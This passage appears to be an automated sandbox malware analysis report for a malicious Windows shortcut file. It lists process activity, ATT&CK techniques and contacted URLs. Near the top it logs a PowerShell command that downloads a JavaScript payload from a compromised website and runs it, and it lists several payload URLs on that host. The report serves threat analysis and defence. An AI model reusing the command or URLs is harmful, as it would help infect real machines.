      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "iwr -outfi $env:programdata\m77m75p1zqw1.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php'; schtasks /delete /tn 7jb5kyotpe8iwe.js /f; wscript $env:programdata\m77m75p1zqw1.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information21
      Scripting      		Valid Accounts1
      Command and Scripting Interpreter      		1
      Scheduled Task/Job      		11
      Process Injection      		21
      Virtualization/Sandbox Evasion      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Scheduled Task/Job      		21
      Scripting      		1
      Scheduled Task/Job      		11
      Process Injection      		LSASS Memory11
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts2
      PowerShell      		Login HookLogin HookBinary PaddingNTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567189 Sample: 6K2g0GMmIE.lnk Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 46 www.italialife24.it 2->46 48 italialife24.it 2->48 52 Malicious sample detected (through community Yara rule) 2->52 54 Windows shortcut file (LNK) starts blacklisted processes 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 12 other signatures 2->58 8 wscript.exe 1 1 2->8         started        11 wscript.exe 2->11         started        13 wscript.exe 2->13         started        15 powershell.exe 14 20 2->15         started        signatures3 process4 dnsIp5 60 Windows shortcut file (LNK) starts blacklisted processes 8->60 62 Suspicious powershell command line found 8->62 64 Wscript starts Powershell (via cmd or directly) 8->64 68 2 other signatures 8->68 19 powershell.exe 16 8->19         started        21 powershell.exe 11->21         started        23 powershell.exe 13->23         started        50 italialife24.it 46.254.34.201, 443, 49704, 49705 SERVERPLAN-ASIT Italy 15->50 44 C:\Users\user\AppData\...\7Jb5KYoTpe8IWE.js, ASCII 15->44 dropped 66 Uses schtasks.exe or at.exe to add and modify task schedules 15->66 25 conhost.exe 1 15->25         started        27 schtasks.exe 1 15->27         started        file6 signatures7 process8 process9 29 wscript.exe 19->29         started        32 conhost.exe 19->32         started        34 schtasks.exe 1 19->34         started        36 conhost.exe 21->36         started        38 schtasks.exe 1 21->38         started        40 wscript.exe 21->40         started        42 conhost.exe 23->42         started        signatures10 70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->70

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      6K2g0GMmIE.lnk42%ReversingLabsShortcut.Trojan.Pantera
      6K2g0GMmIE.lnk43%VirustotalBrowse
      6K2g0GMmIE.lnk100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.italialife24.it0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps10%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/00%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php0%Avira URL Cloudsafe
      https://www.italialife24.it/0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php0%Avira URL Cloudsafe
      https://go.microsl0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/upl0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php0%Avira URL Cloudsafe
      https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phgD0%Avira URL Cloudsafe
      http://www.microsoft.pki/0%Avira URL Cloudsafe
      http://www.italialife24.it0%Avira URL Cloudsafe
      http://italialife24.it0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      italialife24.it
      		46.254.34.201
      		truetrue
        		unknown
        www.italialife24.it
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phptrue
          • Avira URL Cloud: safe
          		unknown
          https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.phptrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.italialife24.itpowershell.exe, 00000000.00000002.2087677827.0000017A24867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A248B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272F94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.00000191994D4000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2107635804.0000017A333D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107635804.0000017A33291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A24B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B9007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B818DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227305A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273ED47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273EE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A8205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A833B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2087677827.0000017A24979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.0000022730313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919979A000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.3282767455.00000191983BD000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.3282767455.00000191983BD000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.phpwscript.exe, 0000000F.00000002.2726788303.0000025C693B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2726045005.0000025C6763C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2725383858.0000025C6762C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726570779.0000025C67650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726393847.0000025C67575000.00000004.00000020.00020000.00000000.sdmp, M77M75P1ZQW1.js.5.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000000.00000002.2087677827.0000017A24012000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B80C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272F94C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019198DBD000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.microsoft.powershell.exe, 00000000.00000002.2111274276.0000017A3B51E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.3282767455.00000191983BD000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.phppowershell.exe, 00000000.00000002.2087400712.0000017A21365000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.italialife24.it/powershell.exe, 00000000.00000002.2110160163.0000017A3B2E4000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.italialife24.it/wp-content/uploads/2021/0wscript.exe, 0000000B.00000002.2650036491.0000027F6D7D5000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://go.microslpowershell.exe, 00000005.00000002.2226302807.0000015BEE229000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2107635804.0000017A333D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107635804.0000017A33291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A24B40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2214064199.0000015B9007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B818DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227305A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273ED47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2799932477.000002273EE7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A8205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3389014272.00000191A833B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019199A68000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.italialife24.it/wp-content/uplwscript.exe, 00000008.00000002.2180873696.0000015ECF725000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://oneget.orgXpowershell.exe, 00000000.00000002.2087677827.0000017A24979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.0000022730313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919979A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.phppowershell.exe, 0000000C.00000002.2815454106.0000022746CF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3405145543.00000191B03B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.italialife24.it/wp-contentwscript.exe, wscript.exe, 00000010.00000002.3254605213.000002BB948D5000.00000004.00000020.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.2087677827.0000017A23221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272ECD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019198191000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1wscript.exe, 0000000F.00000002.2726788303.0000025C693B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2726045005.0000025C6763C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2725383858.0000025C6762C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726570779.0000025C67650000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2726393847.0000025C67575000.00000004.00000020.00020000.00000000.sdmp, M77M75P1ZQW1.js.5.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2087677827.0000017A23221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.000002272ECD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.0000019198191000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.phgDwscript.exe, 00000004.00000002.2109915224.000002F284885000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.microsoft.pki/powershell.exe, 00000000.00000002.2111274276.0000017A3B51E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://oneget.orgpowershell.exe, 00000000.00000002.2087677827.0000017A24979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B81645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.0000022730313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919979A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://italialife24.itpowershell.exe, 00000000.00000002.2087677827.0000017A248D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A2486C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B815D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227302A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919976D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.italialife24.itpowershell.exe, 00000000.00000002.2087677827.0000017A248D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2087677827.0000017A2486C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2154213855.0000015B815D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2712078412.00000227302A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3282767455.000001919976D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.phppowershell.exe, 00000000.00000002.2087400712.0000017A21365000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              46.254.34.201
                                              		italialife24.itItaly
                                              		52030SERVERPLAN-ASITtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1567189
                                              Start date and time:2024-12-03 09:13:09 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 41s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:6K2g0GMmIE.lnk
                                              renamed because original name is a hash value
                                              Original Sample Name:215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326.lnk
                                              Detection:MAL
                                              Classification:mal100.expl.evad.winLNK@24/13@1/1
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 6
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .lnk

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 1436 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 4508 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
